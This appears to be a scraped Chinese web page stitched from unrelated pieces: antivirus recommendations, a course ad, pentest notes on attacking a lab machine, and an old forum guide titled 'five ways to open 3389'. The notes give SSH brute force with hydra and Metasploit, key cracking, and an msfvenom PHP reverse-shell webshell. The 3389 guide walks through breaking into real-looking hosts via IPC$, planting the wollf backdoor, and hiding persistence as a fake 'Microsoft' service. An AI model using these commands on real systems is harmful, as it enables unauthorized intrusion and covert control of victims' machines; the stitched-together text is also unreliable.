hydra 指定端口_hydra端口扫描

hacker|
157

推荐杀毒软件

我推荐你用卡巴全功能2009+360安全卫士。

很多人说卡巴占用内存多,我用着觉得和其它的杀软差不多,诺顿在占用资源方面确实优于其他杀软,但杀毒和防毒能力却与卡巴有点差距,国产的瑞星最好别用,这是处于对你电脑安全的一种友情提示,瑞星杀毒能力很落后与卡巴和诺顿。现在的电脑配置很高,就算卡巴占用资源多点根本就觉察不出,诺顿虽说是正版终生免费升级的,但是英文版的,而你对英文认识不多,操作起来容易出错。

360安全卫士是一种辅助杀软的绿色工具,不是杀毒软件,是国内最受欢迎免费安全软件,它拥有查杀流行木马、清理恶评及系统插件,管理应用软件,系统实时保护,修复系统漏洞等数个强劲功能,同时还提供系统全面诊断,弹出插件免疫,清理使用痕迹以及系统还原等特定辅助功能,并且提供对系统的全面诊断报告,方便用户及时定位问题所在。

卡巴斯基目前最好用的是自带防火墙的卡巴斯基全功能2009。如果你不了解卡巴,请看

1、对病毒上报反应迅速,卡巴斯基具有全球技术领先的病毒运行虚拟机,可以自动分析70%左右未知病毒的行为,再加上一批高素质的病毒分析专家,反应速度就是快于别家。每小时升级病毒的背后是以雄厚的技术为支撑的。

2、对任何上报病毒的用户不问正版,D版,病毒分析师一律回信,有时还详细给出分析结论的依据,体贴呵护用户,有时我想就算写信和他们鬼扯,他们也会回复的,以前一直用D版心里不免愧疚,当网易降价销售卡巴的时候,赶紧去买套正版。这就是卡巴斯基,轻易征服潜在用户的杀毒软件公司。

3、随时修正自身错误,杀毒分析是项繁琐的苦活,卡巴斯基并不是不犯错,而是犯错后立刻纠正,只要用户去信指出,误杀误报会立刻得到纠正。知错就改,堪称其他杀软的楷模,你去试试看给symantec纠错,会是什么结果。

4、卡巴斯基的引擎技术是国内外许多杀毒软件的核心,这是公认的事实,另外,国外的我不知道,国内的杀毒厂商,对上报病毒一律先卡巴扫一遍,这是很有趣的现象,你说,卡巴斯基是不是其他杀软的师傅。

5、卡巴斯基的毒库数量不是最高,但实际可杀病毒数量绝对是世界第一,这是因为,卡巴斯基的超强脱壳能力,无论你怎么加壳,只要程序体还能运行,就逃不出卡巴斯基的掌心,它总唱:是你是你还是你。因此卡巴斯基毒库目前的19万多(在2006-9-2 有198991,2006-10-2已经21万多,2007-3-13是28万多)是真实可杀数量,某些杀软对病毒的加壳版要么傻眼要么列为变种,还沾沾自喜每天100多条升级,殊不知人家卡巴一条升级就顶你几十条了。

6、最重要的一点是,卡巴斯基对上报病毒的用户并没有物质奖励,但大家却趋之若鹜,原因在于:当我1小时前中了未知病毒,于是将病毒体文件发送给卡巴,然后悠悠然去洗澡吃饭,过1小时回来后,将卡巴斯基升级后,伴随着卡巴斯基悠扬的杀猪声响起,可恶的病毒被逐个扫除,那种心理快感和参与感,岂是别的杀软能够带给我们的?

7、卡巴斯基反病毒软件单机版为家庭用户的个人电脑提供超级病毒防护,它具有最尖端的反病毒技术,时刻监控一切病毒可能入侵的途径,同时该产品应用独有的iCheckerTM技术,使处理速度比同类产品快3倍,而且它还应用第二代启发式病毒分析技术识别未知恶意程序代码,成功率约达100%,目前卡巴斯基病毒数据库样本数已经超过100000 万种并且拥有世界上最快的升级速度,每小时常规升级一次,以使系统随时保持抗御新病毒侵害的能力。

8、卡巴斯基反病毒软件单机版可以基于 SMTP/POP3 协议来检测进出系统的邮件,可实时扫描各种邮件系统的全部接收和发出的邮件,检测其中的所有附件,包括压缩文件和文档、嵌入式OLE对象、及邮件体本身。它还新增加了个人防火墙模块,可有效保护运行Windows操作系统的PC,探测对端口的扫描、封锁网络攻击并报告,系统可在隐形模式下工作,封锁所有来自外部网络的请求,使用户隐形和安全地在网上遨游。

9、卡巴斯基反病毒软件可检测出700种以上的压缩格式文件和文档中的病毒,并可清除ZIP、ARJ、CAB和RAR文件中的病毒。卡巴斯基提供7×24小时全天候技术服务.

网络安全去应该去哪里学习呢?。

想要学好网络安全课程,可以选择【老男孩教育】。老男孩教育经过十数年沉淀,重磅推出网络安全课程,该课程以网络安全人才的录用标准进行教学,从根本上提高学员的技术水平,不仅课程体系完善、专业,而且内含众多企业级实战项目。此外,该课程由10年以上网络信息安全领域从业经验的行业大牛亲自授课,毕业即可上手工作,做到真正的学以致用。

入侵开放22端口的靶机

本人笔记,仅供参考

相关靶机:

链接:

提取码:qd32

渗透分析:

对于开启ssh服务的22端口的靶场优先考虑

1.暴力破解

2.私钥泄露

对于开放http服务的80端口或者其他端口的靶场优先考虑(特别注意大于1024的端口)

1.通过浏览器访问对应靶场http服务如地址:端口号

2.使用探测工具对http的目录进行探测,如dirb 地址:端口号

挖掘敏感信息:

使用浏览器对靶场IP的http服务探测,对页面中展示的内容也要注意,尤其是联系人等信息(有可能就是ssh的用户名信息), 递归访问,力争把每一个dirb扫描到的目录页面都访问查看;

尤其对robots.txt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_ rsa);

对于某些靶场,也可以使用nikto扫描器来挖掘敏感信息;

-- nikto -host靶场IP地址

特别注意config等特殊敏感文件,要细读扫描的结果。挖掘可以利用的敏感信息;

登录服务器之后,我们需要做以下操作。

1、查看当前用户whoami .

2、id 查看当前用户的权限

3、查看根目录寻找flag文件

如果是root权限,那么表明这个靶场就被全部拿下。但是如果不是,就肯定需要提权。一

般情况下,flag文件只属于root用户和对应的用户组:

cat /etc/passwd查看所有用户的列装

cat /etc/group查看用户组

find / -user用户名查看属于某些用户的文件

/tmp查看缓冲文件目录

深入挖掘

通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要roor权限。不同的用户都可以有不同的定时任务

cat /etc/crontab挖掘其他用户是否有定时任务,并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。

如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反弹shell,然后netcat执行监听获取对应用户的权限。

如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。

万不得已的时候只能对ssh服务进行暴力破解。破解最后一个

用户名。破解工具如hydra、medusa等;

利用cupp创建字典

git clone 

chmod +x cupp.py

./cupp.py -i以交互的方式创建字典

输入用户名然后一直回车到Do you want to add some random numbers at the end of words?输入yes其他全部no此时创建完成

之后推荐用metasploit破解ssh

在终端中输入

msfconsole

msf  use auxiliary/scaner/ssh/ssh_ login(使用该模块)

set rhosts  192.168.56.103(确定ip地址)

set username 用户名(破解的用户名)

set pass_ file 用户名.txt(刚刚创建的字典)

set threads  5(输入线程)

Run(进攻)

此时破解出密码例如123

直接连接,如果出现问题可以重启msfconsole,启用该模块后

set rhosts 192.168.56.103             (连接远程主机)

set username hadi(用户名)

Set password 123(密码)

Run

界面简陋就使用python优化界面

Python -c “import pty;pty.spawn(‘/bin/bash’)”(优化界面)

此时可以把自己权限提升到root:

su - root

回到根目录ls打开flag文件

Ssh秘钥泄露

解密Ssh秘钥信息(以秘钥名id_isa举例)

Chmod  600 id_isa(赋予is_isa可读可写权限)

ssh2john id_isa  isacrack       (就是用ssh2john把秘钥里的东西转换成john可识别的)

Zcat  /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacracks(利用rockyou字典解出所需要的东西)

制作webshell

msfvenom -p php/meterpreter/reverse_tcp Ihost=攻击机IP地址Iport=4444 -f raw  /root/Desktop/shell.php

启动监听

msf  use exploit/multi/handler

msf exploit(handler)  set payload php/meterpreter/reverse_tcp

Weoshell

msf exploit(handler)  set Ihost攻击机IP地址

msf exploit(handler)  set lport 4444

msf exploit(handler) run

上传Webshell

使用找到的敏感信息登录系统后台,上传webshell。 执行

webshel(访问具有webshell的php页面)

获得反弹的shell

--

wordpress.上传点theme 404.php

执行: http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php

问大家一个关于3389服务的问题

[送给新手]5种方法开启3389

五种办法开启3389终端!!(推荐)

(2004-06-05 17:41)

第一种方法:

==========================================================================================

使用的工具:

1:ipcscan扫描器

2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IPort )

3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)

4:cscript (在system32文件夹下;98操作系统可能没有

二:步骤:

1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)

2:用rots.vbs开启终端服务

说明 cscript ROTS.vbs 目标IP 用户名 密码 [服务端口] [自动重起选项]

格式 cscript.exe rots.vbs ip user userpass port /r

或者 cscript.exe rots.vbs ip user userpass port /fr

三:常见问题:

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.

==========================================================================================

第二种方法:

==========================================================================================

进入后:TELNET上去!

c:\echo [Components] c:\rock

c:\echo TSEnable = on c:\rock

c:\sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q

或者!

c:\echo [Components] d:\wawa

c:\echo TSEnable = on d:\wawa

c:\sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q

等会自动启后就OK

或者:

在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components] c:\sql

echo TSEnable = on

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

net use \\ip地址\ipc$ 密码 /user:用户名(一般默认:administrator)

利用at time 获取对方服务器时间。

copy 路径:\xxx.bat \\ip地址\$c:\winnt

at time 00:00:00 xxx.bat

服务器执行命令后,服务器将重新启动,利用3389登陆就OK了!

==========================================================================================

第三种方法:

==========================================================================================

进入后,再次检查终端组件是否安装:

c:\query user

这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:

USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME

w1 console 0 运行中 . 2002-1-12 22:5

\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.

---------------------------------------------------

C:\dir c:\sysoc.inf /s //检查INF文件的位置

c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf

1 个文件 3,770 字节

-----------------------------------------------------

C:\ dir c:\sysocmgr.* /s //检查组件安装程序

c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe

1 个文件 42,768 字节

-----------------------------------------------------

c:\echo [Components] c:\rock

c:\echo TSEnable = on c:\rock

//这是建立无人参与的安装参数

c:\type c:\rock

[Components]

TSEnable = on

//检查参数文件

------------------------------------------------------

c:\sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q

-----------------------------------------------------

这一条就是真正安装组件的命令.

以上这条命令没有加/R参数,主机在安装完后自动重起.

如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,

3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方

的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,

而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.

==========================================================================================

第四种方法:

==========================================================================================

C:\Documents and Settings\shanlu.XZGJDOMAINnet use \\218.22.155.*\ipc$ "" /us

er:administrator----------------连接成功!

命令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAINcopy wollf.exe \\218.22.155.*\admi

n$------------------------------拷贝wollf.exe到目标计算机的admin$目录

已复制 1 个文件。

C:\Documents and Settings\shanlu.XZGJDOMAINcopy hbulot.exe \\218.22.155.*\adm

in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录

已复制 1 个文件。

C:\Documents and Settings\shanlu.XZGJDOMAINnet time \\218.22.155.*

\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37

命令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAINat \\218.22.155.* 06:39 wollf.exe

新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行

------------------------------------------------------------------------------------------

说明:

wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内

容有关的命令参数,它的高级用法不做补充。

hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。

2分钟后......

------------------------------------------------------------------------------------------

C:\Documents and Settings\shanlu.XZGJDOMAINwollf -connect 218.22.155.* 7614

"Wollf Remote Manager" v1.6

Code by wollf,

------------------------------------------------------------------------------------------

说明:

使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614

7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。

------------------------------------------------------------------------------------------

[server@D:\WINNT\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

------------------------------------------------------------------------------------------

说明:

输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。

------------------------------------------------------------------------------------------

D:\WINNT\system32cd..

cd..

D:\WINNTdir h*.*

dir h*.*

驱动器 D 中的卷没有标签。

卷的序列号是 1CE5-2615

D:\WINNT 的目录

2002-11-27 03:07 DIR Help

2002-09-10 12:16 10,752 hh.exe

2002-10-01 08:29 24,576 HBULOT.exe

2 个文件 35,328 字节

1 个目录 9,049,604,096 可用字节

D:\WINNThbulot

hbulot

------------------------------------------------------------------------------------------

说明:

因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。

==========================================================================================

D:\WINNTexit

exit

Command "DOS" succeed.

[server@D:\WINNT\system32]#reboot

Command "REBOOT" succeed.

[server@D:\WINNT\system32]#

Connection closed.

------------------------------------------------------------------------------------------

说明:

由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT

命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下

。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装

终端服务。

到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!

我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对

目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口

来躲过普通扫描器的扫描!修改方法如下:

修改服务器端的端口设置 ,注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]

PortNumber值,默认是3389,修改成所希望的端口,比如1314

第二个地方:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

PortNumber值,默认是3389,修改成所希望的端口,比如1314

现在这样就可以了。重启系统吧。

注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\connection

connection表示具体的某个RDP-TCP连结。

重启过后,看看端口有没有改。

小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。

==========================================================================================

第五种方法:

==========================================================================================

一.原理性基本安装

1.将如下注册表键值导入 "肉机" 的注册表中:

-------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]

"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]

"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]

"Hotkey"="1"

-----------

2.重新起动"肉机"。

3.使用本地的3398客户端,连接 "肉机" .

4.优(缺)点:

A."肉机"中 "控制面板--添加/删除程序--添加/删除 Windows 组件--终端服务" 仍然处于未安装状态.

B."肉机"中 "开始--程序--管理工具" 没有任何变动.

C."肉机"中 "开始--程序--管理工具--服务--Terminal Services" 变为 "已起动" 和"自动".

D."肉机"中 "Windows 任务管理器--进程" 内,增加 "Termsrv.exe".

5.与"sysocmgr /iysoc.inf /u:u.txt /q" 的比较:

A."肉机"中 "控制面板--添加/删除程序--添加/删除 Windows 组件--终端服务" 处于已安装状态.

B."肉机"中 "开始--程序--管理工具" 增加 "终端服务管理器","终端服务配置" 和 "终端服务客户端生成器".

C."肉机"中 "开始--程序--管理工具--服务--Terminal Services" 变为 "已起动" 和"自动".

D."肉机"中 "Windows 任务管理器--进程" 内,增加 "Termsrv.exe".

E.需要拷贝几兆的文件到"肉机"中.

二.抛砖引玉性"隐蔽"安装:

1.将"肉机"中 "c:\winnt\system32\termsrv.exe" 文件作一备份,命名为"eventlog.exe",仍将其放入目录 "c:\winnt\system32\"

2.将如下注册表键值导入 "肉机" 的注册表中:

------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]

"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]

"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]

"Hotkey"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]

"Start"=dword:00000002

"ErrorControl"=dword:00000001

"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\

74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\

00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00

"ObjectName"="LocalSystem"

"Type"=dword:00000010

"Description"="Microsoft"

"DisplayName"="Microsoft"

---------------

3.重新起动"肉机"。

4.使用本地的3398客户端,连接“肉机”。

5.优(缺)点:

A."肉机"中 "控制面板--添加/删除程序--添加/删除 Windows 组件--终端服务" 仍然处于未安装状态.

B."肉机"中 "开始--程序--管理工具" 没有任何变动.

C."肉机"中 "开始--程序--管理工具--服务--Terminal Services" 没有变化,保持原始状态.

D."肉机"中 "开始--程序--管理工具--服务" 增加 "Microsoft"

E."肉机"中 "Windows 任务管理器--进程" 内,增加 "eventlog.exe".

三.理论简介

如此简单? 只修改注册表? 不需要拷贝W2k源文件?

让我们从一条命令行语句说起,这条语句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下:

-------------

[Components]

TsEnable = on

-------------

首先认识 "sysoc.inf"."sysoc.inf" 是安装信息文件,位于 "c:\winnt\inf". 打开它,在 "[Components]" 节,找到与 "终端服务" 有关的条目:

"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"

这里引出另外一个安装信息文件: "TsOc.inf". 这个文件同样位于 "c:\winnt\inf".

打开这个文件,你会发现,如同 windows 环境下的软件安装, "终端服务" 的安装, 也主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表.

在 [TerminalServices.FreshInstall] 节 和 "File Sections" 部分,你会发现 "终端服务" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位.

为什么 "终端服务" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝的是"终端服务"客户端软件,既 "开始--程序--管理工具--终端服务客户端生成器" 生成客户软盘需要的文件.

各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打头的. 关连 "TsOc.inf" 的 "File Sections" 部分和另外一个文件 "c:\winnt\inf\layout.inf",你将会得到证实.

"终端服务"的安装,需要注册俩个 "DLL". 这俩个 "DLL" 同样早早就住在系统里,想必它们一定也有了身份证.

"TsOc.inf" 文件一半的内容是关于修改注册表. 但"终端服务" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系统安装时注册过的.

我们回头看一下那个命令行语句, "/u:" 参数后面的无人职守安装信息文件 "u.txt". "TsEnable = on" ?

"TsOc.inf" 文件 [Optional Components] 节中有三个选项, "TerminalServices", "TSEnable" ,"TSClients".

"TerminalServices" 如上所述,在系统初始安装时,已经就序. "TSClients" 与 "终端服务" 没有直接的关系.

我们在 "TsOc.inf" 找到 "[TsEnable]" 节. 此节中有用的信息只有一条 "ToggleOnSection = TerminalServices.ToggleOn". 再转到 [TerminalServices.ToggleOn] 节.

[TerminalServices.ToggleOn] 节告诉我们,下一站是 "Reg.ToggleOn", 沿着这个线索,我们来到 [Reg.ToggleOn], 你看到什么

----------------------------------------------

楼主的机器只需要下载一个3389的登陆器,地址如下:

0条大神的评论

发表评论